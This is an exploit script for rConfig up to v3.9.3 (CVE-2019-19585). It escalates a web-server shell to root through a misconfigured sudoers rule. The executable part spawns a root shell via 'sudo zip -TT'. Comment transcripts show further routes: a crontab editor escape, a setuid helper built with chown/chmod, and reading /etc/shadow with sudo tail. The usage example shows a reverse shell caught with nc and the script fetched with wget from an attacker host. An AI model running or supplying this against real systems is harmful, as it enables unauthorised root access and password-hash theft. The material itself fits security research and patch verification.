# Exploit Title: rConfig <= v3.9.3 - Privilege Escalation
# Date: 07/11/2019
# CVE-2019-19585
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: CentOS 7.7
#
# Notes : If you want to reproduce this in your lab environment, follow these links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# Reading the "rConfig 3.x Installation Instructions" (http://help.rconfig.com/gettingstarted/installation), we notice that 2 install scripts are used :
# $ curl -O http://files.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
# $ grep curl install_rConfig.sh
# curl -O http://files.rconfig.com/downloads/scripts/centos7_install.sh -A "Mozilla" >> $LOGFILE 2>&1
# curl -O http://files.rconfig.com/downloads/scripts/centos6_install.sh -A "Mozilla" >> $LOGFILE 2>&1
#
# (Side note: the installer and its helper scripts are fetched over plain HTTP, and no checksum or signature
# verification is visible in these lines, so the install itself is trusting the network path.)
#
# Looking at the install scripts, we see that the apache user is granted passwordless sudo for a fixed list of
# binaries, with requiretty disabled for it. The rule is appended to /etc/sudoers with echo rather than visudo,
# so it is never syntax-checked either.
# $ sed -n 131,148p centos7_install.sh
# #SUDOERs Update
# SUDOINSTALLMSG="Updating Sudoers File..."
# echo $SUDOINSTALLMSG;
# echo -ne '##### (33%\r)'
# sleep 1
# echo -ne '############# (66%)\r'
# sleep 1
# echo -ne '##########################(100%)\n'
# echo "<<<< Start - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
# # update sudoers for rconfig specific tasks
# echo '### rConfig specific Apahce configuration' >> /etc/sudoers
# echo 'apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm' >> /etc/sudoers
# echo 'Defaults:apache !requiretty' >> /etc/sudoers
# cat /etc/sudoers >> $LOGFILE 2>&1
# echo -e "${green}Status: Sudoers Updated${reset}\n";
# echo "<<<< End - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
#
# So if an attacker obtains web RCE / a shell as the apache user, privilege escalation to root can be done with
# multiple techniques: crontab (editor escape), zip (-TT test command), chmod/chown (setuid helper), while tail
# gives arbitrary file read as root and rm gives arbitrary file deletion as root. Several entries in that list
# are individually sufficient, so restricting the allowed arguments would not have been enough; the fix is to
# not grant these binaries to the web server account at all.
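# rConfig <= v3.9.3 - local privilege escalation from the apache user (CVE-2019-19585).
#
# The vendor installer appends a NOPASSWD sudoers rule for apache covering crontab, zip,
# chmod, chown, whoami, wc, tail and rm (see the header above). Each of those is enough to
# reach root from a web shell. The executable part of this script automates the zip route;
# the other routes are kept below as transcripts for manual use.
#
# Usage: run it from a shell already running as apache (e.g. the reverse shell obtained
# through the CVE-2019-19509 authenticated RCE). On success it drops into an interactive
# root /bin/sh; the script returns when that shell exits.
#
# Example
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
#
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34470
# bash: no job control in this shell
# bash-4.2$
#
# bash-4.2$ wget http://192.168.43.245:8000/rconfig_lpe.sh
# wget http://192.168.43.245:8000/rconfig_lpe.sh
# bash-4.2$ chmod 700 rconfig_lpe.sh
# bash-4.2$ ./rconfig_lpe.sh
#
# ./rconfig_lpe.sh
# rConfig v3.9.3 - Privilege Escalation
# id
# uid=0(root) gid=0(root) groups=0(root)

echo "rConfig v3.9.3 - Privilege Escalation"

# Fail fast with a readable message if this account cannot run zip as root without a
# password; otherwise sudo would sit waiting for a password on a reverse shell with no tty.
if ! sudo -n -l /usr/bin/zip >/dev/null 2>&1; then
  echo "[-] sudo will not run /usr/bin/zip without a password for $(id -un); use one of the manual routes below" >&2
  exit 1
fi

# Use a private directory instead of the fixed /tmp/LPE.txt and /tmp/LPE.zip: zip runs as
# root, so a predictable path lets any other local user pre-plant a symlink there or
# collide with a previous run. The directory is removed when the root shell exits.
workdir=$(mktemp -d) || exit 1
trap 'rm -rf -- "$workdir"' EXIT

touch "$workdir/lpe.txt"

# -T makes zip test the archive after writing it, and -TT swaps the test command
# (normally "unzip -tqq") for an arbitrary one, to which zip appends the archive path.
# The trailing '#' turns that appended path into a shell comment, so root just runs /bin/sh.
sudo zip -q "$workdir/lpe.zip" "$workdir/lpe.txt" -T -TT '/bin/sh #'

###########################
# LPE using crontab (ex : using vim)
###########################
# bash-4.2$ sudo crontab -e
# sudo crontab -e
# ...
# :set shell=/bin/sh
# :shell
# id
# uid=0(root) gid=0(root) groups=0(root)

###########################
# LPE using ZIP (manual form of what the script above does, with fixed /tmp paths)
###########################
# bash-4.2$ touch /tmp/LPE.txt
# bash-4.2$ sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
# id
# uid=0(root) gid=0(root) groups=0(root)

###########################
# LPE using chmod / chown
###########################
# bash-4.2$ cd /tmp
# bash-4.2$ echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c
# bash-4.2$ gcc -o privshell privshell.c
# bash-4.2$ rm privshell.c
# bash-4.2$ sudo chown root:root /tmp/privshell
# bash-4.2$ sudo chmod u+s /tmp/privshell
# bash-4.2$ ./privshell
# id
# uid=0(root) gid=48(apache) groups=48(apache)
# Note: only the uid becomes 0 because the helper calls setresuid() alone; add a
# setresgid(0,0,0) call if a root group context is needed. This route also requires a
# compiler on the target, which the zip and crontab routes do not.

###########################
# FILE READ using TAIL
###########################
# bash-4.2$ sudo tail -22 /etc/shadow
# sudo tail -22 /etc/shadow
# root:$6$Jhxxxxxxxxxxxxxxxxxxx8/:18208:0:99999:7:::
# bin:*:17834:0:99999:7:::
# daemon:*:17834:0:99999:7:::
# ...
# EOF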